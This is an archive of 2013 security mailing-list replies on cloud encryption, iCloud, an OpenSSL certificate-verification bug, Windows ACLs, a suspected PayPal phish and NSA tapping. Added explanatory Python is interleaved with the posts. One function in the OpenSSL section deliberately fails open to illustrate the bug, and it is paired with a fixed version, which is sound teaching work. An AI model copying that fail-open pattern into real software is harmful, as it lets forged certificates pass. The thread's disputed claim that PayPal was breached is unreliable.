In my opinion cloud services are good for a temporary burst of CPU resources, not to store data, and not to be used permanently nor as a SPOF. I sometimes use cloud services to launch a build of a large source tree, and then dispose of the machine, but I would never put ownCloud on it to store PGP private keys without a password or my credit card numbers and bank PINs.
Re: [Full-disclosure] Cloud Questions
On Sat, Nov 9, 2013 at 9:51 AM, silence_is_b...@hushmail.com wrote:

On 11/09/2013 at 7:32 AM, David Miller dmil...@metheus.org wrote:

I've been lurking here for some months now and have seen plenty of vulnerabilities go by for applications, and the occasional OS-level exploit. I don't think I've seen a single post about cloud security. Is 'the cloud', AWS in particular, believed to be secure? Is it simply not targeted? Or would it be covered by some other list? Inquiring minds are, uh, inquiring. TIA, David

There is no such thing as cloud security (to me at least). Companies may transfer/store encrypted, but if the NSA/law enforcement ask for it, they give it up. That's not secure to me... that's more data held hostage (iCloud anyone?).

I think you are right in that good bad guys (law enforcement) and bad bad guys (cyber-criminals) attack the node. In this case, the node is the cloud provider. But it also depends on what the data is.

I have no faith in CloudHSM, HighCloud or other low-level machinery. That's the unattended key storage problem, and it's a problem without a solution. Plus, the data becomes available as soon as the VM is powered on.

Objects in storage (Amazon S3 or OpenStack Swift) can be encrypted using standard crypto methods with minimal risk. The encryption function will act like a PRP, and the ciphertext will be indistinguishable from random. Minimal risk would include leaking the origin (LE probably has that through the account) and leaking file size (unless specific measures are taken). If the owner of the document wants anonymity, they should probably use a Tor hidden service.

Other higher-level services, like SaaS and DaaS, probably won't fare so well. Those tokenization schemes used for database field encryption by CipherCloud do not live up to expectations. It probably wanders near false/misleading and fraud, and the FTC should investigate some of their claims (unless CipherCloud have a homomorphic encryption system that no one knows about).
As a matter of fact, when an informal security analysis was performed and posted to StackExchange, CipherCloud issued a DRM takedown! https://www.google.com/search?q=ciphercloud+drm+takedown.

Jeff
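The point Jeff makes about object stores is that the only thing a well-encrypted blob gives away is its size, unless you pad. The following is an added example of mine (not code from the thread or from any provider) of client-side object encryption with length hiding: encrypt-then-MAC, a random nonce, and the plaintext length-prefixed and padded up to a 4 KiB bucket before encryption, so an observer of the store sees only the bucket count. Because the standard library has no AES, the keystream is HMAC-SHA256 in counter mode (a PRF, so the output is still indistinguishable from random); in production you would use AES-GCM or a NaCl secretbox from a real library and keep the padding step. The bucket size, key labels and sample inputs are my own choices.

```python
import hashlib
import hmac
import secrets
import struct

# Constructed parameters: a 4 KiB size bucket hides exact object lengths;
# only the bucket count is visible to whoever can see the stored blob.
BUCKET = 4096
NONCE_LEN = 16
TAG_LEN = 32
LEN_PREFIX = 8


def derive_keys(master_key: bytes):
    """Split one master key into independent encryption and MAC keys (labelled HMAC)."""
    enc_key = hmac.new(master_key, b"object-encryption", hashlib.sha256).digest()
    mac_key = hmac.new(master_key, b"object-authentication", hashlib.sha256).digest()
    return enc_key, mac_key


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode as a PRF-based keystream (stdlib only; AES-CTR in practice)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_object(enc_key: bytes, mac_key: bytes, plaintext: bytes, bucket: int = BUCKET) -> bytes:
    """Returns nonce || ciphertext || tag. Plaintext is length-prefixed and padded to a bucket multiple."""
    nonce = secrets.token_bytes(NONCE_LEN)
    padded = struct.pack(">Q", len(plaintext)) + plaintext
    padded += b"\x00" * (-len(padded) % bucket)
    body = _xor(padded, _keystream(enc_key, nonce, len(padded)))
    tag = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()  # encrypt-then-MAC
    return nonce + body + tag


def is_authentic(mac_key: bytes, blob: bytes) -> bool:
    """Constant-time tag check; run before touching the ciphertext."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        return False
    expected = hmac.new(mac_key, blob[:-TAG_LEN], hashlib.sha256).digest()
    return hmac.compare_digest(expected, blob[-TAG_LEN:])


def decrypt_object(enc_key: bytes, mac_key: bytes, blob: bytes) -> bytes:
    if not is_authentic(mac_key, blob):
        raise ValueError("authentication failed; refusing to decrypt")
    nonce, body = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN]
    padded = _xor(body, _keystream(enc_key, nonce, len(body)))
    (n,) = struct.unpack(">Q", padded[:LEN_PREFIX])
    if n > len(padded) - LEN_PREFIX:
        raise ValueError("corrupt length prefix")
    return padded[LEN_PREFIX:LEN_PREFIX + n]


def stored_size(plaintext_len: int, bucket: int = BUCKET) -> int:
    """What an observer of the object store learns: only the bucket count."""
    padded = LEN_PREFIX + plaintext_len
    padded += -padded % bucket
    return NONCE_LEN + padded + TAG_LEN
```

A 100-byte and a 3000-byte object both come out at 4144 bytes; the origin (which account uploaded it) is still visible to the provider, exactly as the post says.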
Re: [Full-disclosure] Mavericks... less than a bargain?
On Mon, Oct 28, 2013 at 4:49 PM, Joel Esler joel.es...@me.com wrote:

Obviously they expect you to surrender the info in the sake of simplicity and usefulness.

They swear they can't read your stuff: http://www.apple.com/apples-commitment-to-customer-privacy/ :) Their own legal department tells us they are not trustworthy. Who do we believe: their legal department, or their press release?

Jeff

On Oct 28, 2013, at 03:30 PM, PuNkErX w punk...@hotmail.com wrote:

I usually lurk the list but here's my take on it. Using iCloud to sync everything is stupid if you care about privacy. Unless you don't mind all your info (especially now that you can sync the keychain) being out there. As an old Apple fanboy I'm disgusted but not surprised with the direction they went. That's why I got out of the Apple world when 10.7 dropped. I host an old MacBook with 10.6 Server that has iCal and Address Book services to sync stuff between a 10.9 laptop, 10.6 laptop, iPhone and iPad. It works for what I need but obviously it isn't for everyone. I'm looking at other alternatives for all-in-one type deals but it seems every cloud service pretty much sells your info in one shape, way or form. So you don't need to use iCloud at all, but it appears you will need a third-party server to sync stuff. Yet another step back asswards for the industry.

On Oct 28, 2013, at 10:43, silence_is_b...@hushmail.com wrote:

The functionality of syncing contacts/calendar is MISSING in iTunes... gone... poof... Casper... out of luck. Plug in your iDevice on the latest, then check it out... you can sync photos and music, but nothing else... it's a bad scene.

On Monday, October 28, 2013 at 8:34 AM, Joel Esler joel.es...@me.com wrote:

What happens when you refuse to sign up for iCloud?
sent from my iCloud account -- Joel Esler

On Oct 28, 2013, at 08:09 AM, silence_is_b...@hushmail.com wrote:

A warning (disclosure) to you Apple people: if you're planning to sync your shiny iDevice with Mavericks, you will be FORCED to use iCloud (syncing from your iDevice to your iPuter is now gone). I suspect this is one of the reasons why Mavericks was a free upgrade. Apple probably figured the $40 they'd get from the sale of the OS is less than what they'd get from having your calendar and your contacts within easy reach.

Per their policy:

What personal information we collect

When you create an Apple ID, register your products, apply for commercial credit, purchase a product, download a software update, register for a class at an Apple Retail Store, or participate in an online survey, we may collect a variety of information, including your name, mailing address, phone number, email address, contact preferences, and credit card information. When you share your content with family and friends using Apple products, send gift certificates and products, or invite others to join you on Apple forums, Apple may collect the information you provide about those people such as name, mailing address, email address, and phone number.

How we use your personal information

The personal information we collect allows us to keep you posted on Apple's latest product announcements, software updates, and upcoming events. It also helps us to improve our services, content, and advertising.

Nice not to have choices ;)
[Full-disclosure] iOS: List of available trusted root certificates (iOS 7)
iOS: List of available trusted root certificates, http://support.apple.com/kb/HT5012.

Lots of goodies in that list of 200+, including the use of MD2 and MD5. The usual suspects are also present, including CNNIC (or if you're from China, the U.S. bloat).
Re: [Full-disclosure] possible backdoor in OpenSSL X509 verification
Can someone take a look at this shady X.509 certificate verification code (fails open in case of out-of-memory error): http://rt.openssl.org/Ticket/Display.html?id=2924

Well, I know Dr. Henson, Steve Marquess, Andy Polyakov, Tim Hudson, and a few others (to varying degrees). I can tell you it's not an intentional back door along the lines of http://cryptome.org/2012/01/0032.htm.

OpenSSL has one full-time developer dedicated to maintaining the library. Oftentimes, he's busy consulting for the Foundation so he does not have the opportunities to maintain the code like folks want.

http://rt.openssl.org/Ticket/Display.html?id=2924

Keep in mind that OpenSSL recently migrated bug trackers (from an old RT to a new RT), so that bug may be older than November 2012. And it might be fixed in the sources, too. The best I can tell, no one really maintains that list (when's the last time you saw something acknowledged?). It's more like a scratch pad.

No one from the OpenSSL team has commented whether this is exploitable or should it be rewritten in a safer manner.

OpenSSL is an open project, and it lacks a solid engineering process. What you are seeing is the effects of an ad hoc process, donated developer time, and open source development.

This is because the for loop later does not require finding even a single issuer certificate from the trust store and will happily break the loop if the last certificate is actually self-signed.

It's just another bug that slipped through the cracks. No one is trying to hide a back door. I've tried to get the Foundation to address these problems with policy (everything must have positive and negative test cases). No one really cared. Then I tried to get them to address it by accepting my negative test cases (which broke things in practice). No one really cared. Until the project improves their engineering process, things won't change.

If you can put together a test case showing any certificate is accepted (and subject to tampering or MitM), then that's a security defect.
You should probably get a CVE for it so it can be tracked.

Jeff

On Fri, Sep 6, 2013 at 10:28 AM, Arnis ar...@ut.ee wrote:

Can someone take a look at this shady X.509 certificate verification code (fails open in case of out-of-memory error): http://rt.openssl.org/Ticket/Display.html?id=2924

Certificate chain verification in crypto/x509/x509_vfy.c X509_verify_cert() fails badly and may allow verification bypass if check_issued() on line 259 returns a false negative on the check whether the last certificate in the chain is self-signed. For example, check_issued() may return a false negative in case of memory allocation failure (although I could not find how to force that).

253 /* Examine last certificate in chain and see if it
254  * is self signed.
255  */
256
257 i=sk_X509_num(ctx->chain);
258 x=sk_X509_value(ctx->chain,i-1);
259 if (ctx->check_issued(ctx, x, x))

This is because the for loop later does not require finding even a single issuer certificate from the trust store and will happily break the loop if the last certificate is actually self-signed.

No one from the OpenSSL team has commented whether this is exploitable or should it be rewritten in a safer manner.

P.S. Subject field inspired by latest NSA stories ;)
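The bug class Arnis describes is a verifier whose error path is indistinguishable from a negative answer, so a transient failure of the self-signed check steers the chain-building loop into an exit that was never meant to mean "trusted". The following is an added example of mine, not OpenSSL code and not Jeff's test case: a small Python model of just the "examine last certificate, then extend from the trust store" stage, with a checker that can answer True, False or None (could not check). The fail-open shape reproduces the pattern from the ticket; the fail-closed version succeeds only on positive evidence of a trust anchor and rejects on any checker error. Certificates are name-only stand-ins (no real signatures), and the chain, trust store and FlakyChecker are constructed.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class Cert:
    """Minimal stand-in for an X509: just the names that drive chain building (constructed model)."""
    subject: str
    issuer: str


# A checker answers True (issuer signed cert), False (it did not), or None when the check
# itself could not run (the allocation-failure case the ticket describes). Real code verifies
# a signature here; this model only compares names.
Checker = Callable[[Cert, Cert], Optional[bool]]


def names_match(issuer: Cert, cert: Cert) -> Optional[bool]:
    return cert.issuer == issuer.subject


class FlakyChecker:
    """Constructed: reports an error (None) for the first `failures` calls, then answers normally."""

    def __init__(self, failures: int = 1) -> None:
        self.failures = failures

    def __call__(self, issuer: Cert, cert: Cert) -> Optional[bool]:
        if self.failures > 0:
            self.failures -= 1
            return None
        return names_match(issuer, cert)


def verify_chain_fail_open(chain: List[Cert], trust_store: List[Cert], check_issued: Checker) -> bool:
    """Model of the fail-open shape: an error from the self-signed test reads as 'not self-signed',
    and the loop that should reach a trust anchor exits early once the certificate looks
    self-signed, reporting success without ever having consulted the store positively."""
    x = chain[-1]
    if check_issued(x, x):                 # None (error) is treated like False here
        return x in trust_store
    while True:
        if check_issued(x, x):             # the error has cleared: "it is self-signed", stop walking
            break
        issuer = next((a for a in trust_store if check_issued(a, x)), None)
        if issuer is None:
            return False
        x = issuer
    return True                            # reached with no trust-store hit


def verify_chain_fail_closed(chain: List[Cert], trust_store: List[Cert],
                             check_issued: Checker) -> Tuple[bool, str]:
    """Succeeds only on positive evidence: the last certificate is a trust anchor, or some anchor
    is positively found to have issued it. Any checker error rejects."""
    if not chain:
        return False, "empty chain"
    last = chain[-1]
    if last in trust_store:
        return True, "chain ends in a trust anchor"
    for anchor in trust_store:
        result = check_issued(anchor, last)
        if result is None:
            return False, "issuer check could not run; refusing to continue"
        if result:
            return True, "anchored at " + anchor.subject
    return False, "no trust anchor issued " + last.subject
```

The fail-closed version never needs the self-signed test at all: a self-signed certificate that is not in the store and was not issued by any anchor is simply untrusted, which is the negative test case Jeff asks for.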
Re: [Full-disclosure] Defense in depth -- the Microsoft way (part 8): execute everywhere!
Hi Stefan,

... administrative rights for every user account

Hmmm... XP/x64 appears to have a bug such that the second user also needs to be admin (perhaps XP/x86, too). XP does not recognize the first account as admin, so the second account cannot be limited (at least on my test box). Vista and above make the first user admin, but other users default to standard.

Jeff

On Sat, Aug 24, 2013 at 5:32 PM, Stefan Kanthak stefan.kant...@nexgo.de wrote:

Hi,

since its start about 20 years ago Windows NT has supported (fine-grained) ACLs, including the permission "execute file". In their very finite wisdom Microsoft nonetheless decided back then to have this permission set on EVERY file a user creates (and assumes it is set on local and remote file systems which don't support ACLs).

The result: on Windows, malware can run everywhere (and since CWD alias "." is in the path, can be started everywhere)!

These fundamental errors, combined with two other fundamental errors (NO ACLs on %SystemRoot% and %ProgramFiles% to prevent write access for non-administrative user accounts, and administrative rights for every user account) turned Windows NT into the same unsafe, insecure and vulnerable system its predecessors MS-DOS and Windows 3.x were and enabled miscreants to abuse internet-connected Windows systems to distribute SPAM, launch DDoS attacks, spread malware, etc.

For a company that puts compatibility above all other criteria this decision might have looked reasonable ... BUT: it was NOT! Windows NT introduced the Win32 API, which is/was INCOMPATIBLE with the existing DOS and Win16 APIs. To run existing applications written for the old APIs Windows NT introduced NTVDM (the Virtual DOS Machine) and WoW (the Windows on Windows subsystem); only these Windows NT components had to be made compatible (and unsafe enough to run old applications).
There was ABSOLUTELY no need to sacrifice the safety and security of Windows NT and the Win32 API for the sake of compatibility: the Win32 API was new, no existing applications had to be supported!

Then sloppy developers started to build their applications for the Win32 API of this unsafe/insecure environment ... and expected their unsuspecting victims^Wusers to have write access to %SystemRoot% and/or %ProgramFiles% to write their *.INI files, for example, or to run their crapware with administrative or power-user rights.

JFTR: for many years Microsoft has made many (almost futile) attempts to mitigate the effect of their wrong design decision(s), for example:

* http://support.microsoft.com/kb/269049 alias http://technet.microsoft.com/security/bulletin/ms00-052
* http://support.microsoft.com/kb/306850
* http://support.microsoft.com/kb/905890
* http://support.microsoft.com/kb/953818 alias http://technet.microsoft.com/security/advisory/953818
* http://support.microsoft.com/kb/959426 alias http://technet.microsoft.com/security/bulletin/ms09-015
* http://support.microsoft.com/kb/2264107
* http://support.microsoft.com/kb/2269637 alias http://technet.microsoft.com/security/advisory/2269637 PLUS the 28(!) security bulletins listed there

but NEVER tackled the source of the problem! Instead they introduced things like the security theatre UAC: with Windows 8 the user account(s) created during setup still have administrative rights. And Windows 7 introduced the silent elevation for about 70 of Microsoft's own programs... stay tuned

Stefan Kanthak

PS: if you want to mitigate the wrong design decision that every file is executable: add and propagate an inheritable-only deny ACE with "execute file" permission for the user group WORLD\Everyone alias S-1-1-0, (D;OIIO;WP;;;WD) in SDDL notation, at least for %USERPROFILE% and %ALLUSERSPROFILE% alias %ProgramData%.
On Windows NT 6.x, consider adding another deny ACE which prevents the directory's/object's owner from changing/removing that permission: (D;;WDAC;;;OW) in SDDL notation.

Since this mitigation will stop Administrators and LocalSystem from running files in their user profiles (to be precise: in %TEMP% alias %USERPROFILE%\Local Settings\Application Data\TEMP or %USERPROFILE%\AppData\TEMP, where self-extracting installers will typically unpack and execute their payload) you'll have to remove the user environment variables TEMP and TMP of these user accounts (putting the system environment variables TEMP and TMP, which point to %SystemRoot%\TEMP, into effect).

See the script http://home.arcor.de/skanthak/download/~EXECUTE.INF for a POC (targeting Windows NT 5.x). It sets the deny ACE also on subordinate directories which are exempt from ACL inheritance, as well as on some of the user-writable subdirectories of %SystemRoot% which don't host executable files.

WARNING: unfortunately the (only) Microsoft utility which allows adding the specific ACEs, ICACLS.EXE, used in
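Before applying an ACE like the one Stefan proposes, it helps to be able to read it. The following is an added example of mine (not Stefan's script and not a Microsoft tool): a small parser for the SDDL ACE string format, (type;flags;rights;object-guid;inherit-guid;sid), that decodes the two-letter tokens into the access mask and the well-known SID, and then reads the mask bits as the file-system rights they denote on a file or directory, which is how "WP" (0x20) becomes FILE_EXECUTE on a file. The token tables cover the common SDDL rights, flags and SIDs only; the extra ACE strings in the test are constructed. Note that the same two letters mean different things in different fields: "WD" is the Everyone SID in the trustee field but WRITE_DAC in the rights field.

```python
import re

ACE_TYPES = {"A": "Allow", "D": "Deny", "AU": "Audit"}
ACE_FLAGS = {"CI": "CONTAINER_INHERIT", "OI": "OBJECT_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED", "SA": "SUCCESSFUL_ACCESS", "FA": "FAILED_ACCESS"}
RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,   # generic rights
    "RC": 0x20000, "SD": 0x10000, "WD": 0x40000, "WO": 0x80000,              # standard rights
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,       # object-specific bits
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,           # file composites
}
# The same bits read as the file-system access rights they map to on a file or directory.
FILE_BITS = [
    (0x1, "FILE_READ_DATA/LIST_DIRECTORY"), (0x2, "FILE_WRITE_DATA/ADD_FILE"),
    (0x4, "FILE_APPEND_DATA/ADD_SUBDIRECTORY"), (0x8, "FILE_READ_EA"), (0x10, "FILE_WRITE_EA"),
    (0x20, "FILE_EXECUTE/TRAVERSE"), (0x40, "FILE_DELETE_CHILD"), (0x80, "FILE_READ_ATTRIBUTES"),
    (0x100, "FILE_WRITE_ATTRIBUTES"), (0x10000, "DELETE"), (0x20000, "READ_CONTROL"),
    (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER"), (0x100000, "SYNCHRONIZE"),
]
WELL_KNOWN_SIDS = {"WD": "S-1-1-0", "OW": "S-1-3-4", "CO": "S-1-3-0", "SY": "S-1-5-18",
                   "AU": "S-1-5-11", "BA": "S-1-5-32-544", "BU": "S-1-5-32-545"}

ACE_RE = re.compile(r"^\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[A-Za-z0-9]*);"
                    r"(?P<objg>[^;]*);(?P<inhg>[^;]*);(?P<sid>[^)]*)\)$")


def _pairs(field: str):
    """SDDL packs two-letter tokens back to back ('OIIO' is OI + IO)."""
    if len(field) % 2:
        raise ValueError("odd-length token list: %r" % field)
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def parse_rights(field: str) -> int:
    """Rights are either a hex mask ('0x...') or a run of two-letter tokens OR'd together."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for tok in _pairs(field):
        if tok not in RIGHTS:
            raise ValueError("unknown SDDL right %r" % tok)
        mask |= RIGHTS[tok]
    return mask


def file_rights(mask: int):
    return [name for bit, name in FILE_BITS if mask & bit]


def parse_ace(text: str) -> dict:
    m = ACE_RE.match(text.strip())
    if not m:
        raise ValueError("not an SDDL ACE string: %r" % text)
    if m["type"] not in ACE_TYPES:
        raise ValueError("unsupported ACE type %r" % m["type"])
    flags = []
    for tok in _pairs(m["flags"]):
        if tok not in ACE_FLAGS:
            raise ValueError("unknown ACE flag %r" % tok)
        flags.append(ACE_FLAGS[tok])
    mask = parse_rights(m["rights"])
    trustee = WELL_KNOWN_SIDS.get(m["sid"], m["sid"])
    if not trustee.startswith("S-1-"):
        raise ValueError("unknown SID token %r" % m["sid"])
    return {
        "type": ACE_TYPES[m["type"]],
        "flags": flags,
        "mask": mask,
        "file_rights": file_rights(mask),
        "trustee": trustee,
        # An inherit-only ACE never applies to the object it is set on, only to children.
        "applies_to_self": "INHERIT_ONLY" not in flags,
    }


def describe(text: str) -> str:
    ace = parse_ace(text)
    return "%s %s to %s; flags %s; %s" % (
        ace["type"], ", ".join(ace["file_rights"]) or hex(ace["mask"]), ace["trustee"],
        "+".join(ace["flags"]) or "none",
        "children only" if not ace["applies_to_self"] else "this object")
```

Run on (D;OIIO;WP;;;WD) this yields a Deny of FILE_EXECUTE/TRAVERSE to S-1-1-0 with OBJECT_INHERIT+INHERIT_ONLY, so the directory itself is untouched and every file created beneath it inherits the deny, which is what the post is after.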
Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)
On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn j...@thejh.net wrote:

On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:

Hello dear companions, Two days ago one of my tor exit nodes experienced something I'm now calling limestonenetworks DDoS on polipo ( $WAN_IP:8123 ), since all

DDoS? So you mean your systems were impacted by that?

He may be running an exit node for the benefit of others on a low-bandwidth connection. Forgive me if you were joking with an old friend, or I missed something.

Jeff
Re: [Full-disclosure] Who's behind limestonenetworks.com AKA DDoS on polipo(8123)
On Fri, Aug 16, 2013 at 4:30 PM, Jann Horn j...@thejh.net wrote:

On Fri, Aug 16, 2013 at 01:37:54PM -0400, Jeffrey Walton wrote:

On Fri, Aug 16, 2013 at 1:31 PM, Jann Horn j...@thejh.net wrote:

On Thu, Aug 15, 2013 at 05:29:52PM -0300, Luther Blissett wrote:

Hello dear companions, Two days ago one of my tor exit nodes experienced something I'm now calling limestonenetworks DDoS on polipo ( $WAN_IP:8123 ), since all

DDoS? So you mean your systems were impacted by that?

He may be running an exit node for the benefit of others on a low-bandwidth connection. Forgive me if you were joking with an old friend, or I missed something.

Let's check how massive that attack is.

I didn't claim it was massive. I simply said he may be bandwidth limited. What other traffic is on that line? Or do all Tor folks purchase a second internet connection for their Tor services?

Jeff
Re: [Full-disclosure] CALEA Re: XKeyscore
On Mon, Aug 12, 2013 at 9:07 AM, Pedro Luis Karrasquillo peter_toy...@hotmail.com wrote:

... On slide 7 they show a red dot over Venezuela. You think Chavez let the spooks tap into the fiber there too? Where does the fiber tap connect to? Oh wait, there is a red dot over Moscow too...

One of my former college instructors (Dr. Henry Katz) headed this program while he was at the NSA: https://en.wikipedia.org/wiki/Operation_Ivy_Bells. Dr. Katz could talk about it because it was eventually reported in the press after all the dust settled.

Jeff
[Full-disclosure] Fwd: [cryptography] Paypal phish using EV certificate
It looks like Paypal has suffered a break-in and phishing attempts are being made on its users. Time to sell your stock (or buy it short) for the immediate future.

-- Forwarded message --
From: Jeffrey Walton noloa...@gmail.com
Date: Tue, Aug 13, 2013 at 5:25 AM
Subject: Re: [cryptography] Paypal phish using EV certificate
To: Peter Gutmann pgut...@cs.auckland.ac.nz
Cc: cryptogra...@randombit.net

On Tue, Aug 13, 2013 at 5:10 AM, Peter Gutmann pgut...@cs.auckland.ac.nz wrote:

I recently got another of the standard phishing emails for Paypal, directing me to https://email-edg.paypal.com, which redirects to https://view.paypal-communication.com, which has a PayPal EV certificate from Verisign. According to this post http://www.onelogin.com/a-paypal-phishing-attack/ it may or may not be a phishing attack (no-one's really sure), and this post http://www.linuxevolution.net/?p=12 says it is a phishing attack and the site will be shut down by Paypal... back in May 2011. Can anyone explain this? It's either a really clever phish (or the CAs are following their historically lax levels of checking), or Paypal has joined the ranks of US banks in training their users to become phishing victims.

If that's true, I think the more interesting fact is: it appears email-edg.paypal.com is controlled by the attacker. Why else would Paypal redirect from a host in their domain to a host not in their domain controlled by the adversary? (It's a bit different than standard phishing training where both hosts/domains are controlled by Paypal).

Has Paypal fessed up to any break-ins or breaches?

Jeff
Re: [Full-disclosure] Fwd: [cryptography] Paypal phish using EV certificate
On Tue, Aug 13, 2013 at 7:22 AM, Julius Kivimäki julius.kivim...@gmail.com wrote:

All of the domains involved just happen to be registered on markmonitor by PayPal. Really doubt this has anything to do with phishing.

According to http://www.linuxevolution.net/?p=12 (referenced in the original email), Paypal stated the site paypal-communication.com was a phishing site.

2013/8/13 Jeffrey Walton noloa...@gmail.com

It looks like Paypal has suffered a break-in and phishing attempts are being made on its users. Time to sell your stock (or buy it short) for the immediate future.

-- Forwarded message --
From: Jeffrey Walton noloa...@gmail.com
Date: Tue, Aug 13, 2013 at 5:25 AM
Subject: Re: [cryptography] Paypal phish using EV certificate
To: Peter Gutmann pgut...@cs.auckland.ac.nz
Cc: cryptogra...@randombit.net

On Tue, Aug 13, 2013 at 5:10 AM, Peter Gutmann pgut...@cs.auckland.ac.nz wrote:

I recently got another of the standard phishing emails for Paypal, directing me to https://email-edg.paypal.com, which redirects to https://view.paypal-communication.com, which has a PayPal EV certificate from Verisign. According to this post http://www.onelogin.com/a-paypal-phishing-attack/ it may or may not be a phishing attack (no-one's really sure), and this post http://www.linuxevolution.net/?p=12 says it is a phishing attack and the site will be shut down by Paypal... back in May 2011. Can anyone explain this? It's either a really clever phish (or the CAs are following their historically lax levels of checking), or Paypal has joined the ranks of US banks in training their users to become phishing victims.

If that's true, I think the more interesting fact is: it appears email-edg.paypal.com is controlled by the attacker. Why else would Paypal redirect from a host in their domain to a host not in their domain controlled by the adversary? (It's a bit different than standard phishing training where both hosts/domains are controlled by Paypal).

Has Paypal fessed up to any break-ins or breaches?
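The whole disagreement above turns on one question: does a hop in the redirect chain leave the brand's own registrable domain? That is exactly the check a defender watching a brand's redirectors (or a mail gateway scoring links) should automate, and it is easy to get wrong. The following is an added example of mine, not code from the thread: it walks an observed redirect chain (here the two hostnames Peter quoted, as constructed input) and reports the first hop that is not HTTPS on a host inside a trusted domain, using a label-boundary suffix match. The naive substring check is shown beside it to make the failure mode visible; paypal.com.evil.example is a constructed look-alike hostname.

```python
from typing import List, Optional
from urllib.parse import urlsplit


def host_in_domain(host: str, domain: str) -> bool:
    """True only when host IS the domain or a subdomain of it (suffix match on a label boundary)."""
    host, domain = host.lower().rstrip("."), domain.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def naive_brand_check(host: str, brand: str) -> bool:
    """The check that looks right and is not: substring matching on the brand name."""
    return brand.lower() in host.lower()


def first_foreign_hop(chain: List[str], trusted_domains: List[str]) -> Optional[str]:
    """Walk an observed redirect chain in order and return the first URL whose host is outside
    every trusted domain or that is not served over HTTPS; None when every hop stays in bounds."""
    for url in chain:
        parts = urlsplit(url)
        host = parts.hostname or ""
        if parts.scheme != "https" or not any(host_in_domain(host, d) for d in trusted_domains):
            return url
    return None


# Constructed input: the two hosts named in the thread, in the order they were observed.
OBSERVED_CHAIN = [
    "https://email-edg.paypal.com/",
    "https://view.paypal-communication.com/",
]
```

For OBSERVED_CHAIN with ["paypal.com"] as the trusted set, the second hop is flagged; the substring check would pass both hops, and would also pass a host like paypal.com.evil.example, which is why brand-name matching belongs nowhere near a phishing verdict.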
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
On Mon, Aug 12, 2013 at 1:28 PM, Coderaptor coderap...@gmail.com wrote:

I have been a silent spectator to this drama, and could not resist adding a few thoughts of my own:

1. All software, especially webservers, should ship with secure defaults. Period. It is a fundamental mistake to assume all admins who roll out web apps and maintain servers RTFM before rolling out. The key idea here is time to market, and there is a huge amount of data to prove this.

+1. All software should be shipped secure out of the box. It's amazing so many folks keep making the same mistakes from the 1980s and 1990s.

... A huge amount of software today is turd polishing, open source no exception (though it is supposed to have a better track record). The blame lies squarely on everyone. The "more eyes the better" theory is hogwash.

I cringe when I hear anyone discussing the security of crowd sourcing. There are two problems with their arguments: first is Cognitive Biases, and second is the Bystander Effect. The biases are being demonstrated by NB and RH, and its results are typical (no offense NB and RH). The Bystander Effect ensures that the more people see a bug, the less likely they are going to do anything about it because they believe someone else has already done something. They are well-known problems in Security Engineering. See Peter Gutmann's Engineering Security (www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf) or Ross Anderson's Security Engineering (http://www.cl.cam.ac.uk/~rja14/book.html).

Jeff

On Aug 11, 2013, at 3:30 PM, Reindl Harald h.rei...@thelounge.net wrote:

On 11.08.2013 23:56, Stefan Kanthak wrote:

Reindl Harald h.rei...@thelounge.net wrote:

again: symlinks are not poison always and everywhere; they become so where untrusted customer code is running. Blame the admin which does not know his job and not the language offering a lot of functions where some can be misused

Again: symlinks are well-known as an attack vector for years!
and that's why any admin which is not clueless disables the symlink function - but there exists code which *is* secure, runs in a controlled environment and makes use of it for good reasons

It's not the user/administrator who develops or ships insecure code!

but it's the administrator which has the wrong job if creating symlinks is possible from any random script running on his servers

anyways, i am done with this thread. the topic is *not* Apache suEXEC privilege elevation, it is admins not securing their servers - period
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
On Sat, Aug 10, 2013 at 6:10 AM, Gichuki John Chuksjonia chuksjo...@gmail.com wrote:

One thing you gotta remember: most of the admins who handle webservers in a network are also developers, since most of the organizations will always need to cut expenses, and as we know, most of the developers will just look into finishing work and making it work. So if something doesn't run due to httpd.conf, you will find these guys loosening server security, therefore opening holes in the infrastructure.

Cognitive Bias and Dissonance are well-known problems in security engineering. NB's comments are a testament to the disconnect between the creators of the system and the users of the system. (No offense to NB). See, for example, Peter Gutmann's Engineering Security (www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf) or Ross Anderson's Security Engineering (http://www.cl.cam.ac.uk/~rja14/book.html).

Jeff
Re: [Full-disclosure] XKeyscore sees 'nearly EVERYTHING you do online
On Thu, Aug 1, 2013 at 2:56 PM, Gary Baribault g...@baribault.net wrote:

Optically tapping ALL of the submarine cable going into and out of the U.S. would still not give them ALL of the claimed data. They have to be tapping all of the major traffic exchange sites in the U.S. to get this kind of data.

The US does that. In 'The Spy Factory' (http://video.pbs.org/video/1051968443/) from 2009, the producers interviewed the AT&T technicians who worked at the COs where the taps occur. They also interviewed a US Army analyst who listened in on the calls. Since the video, there have been a number of documents circulating about the practice. See, for example, http://en.wikipedia.org/wiki/Stellar_Wind_(code_name).

Jeff

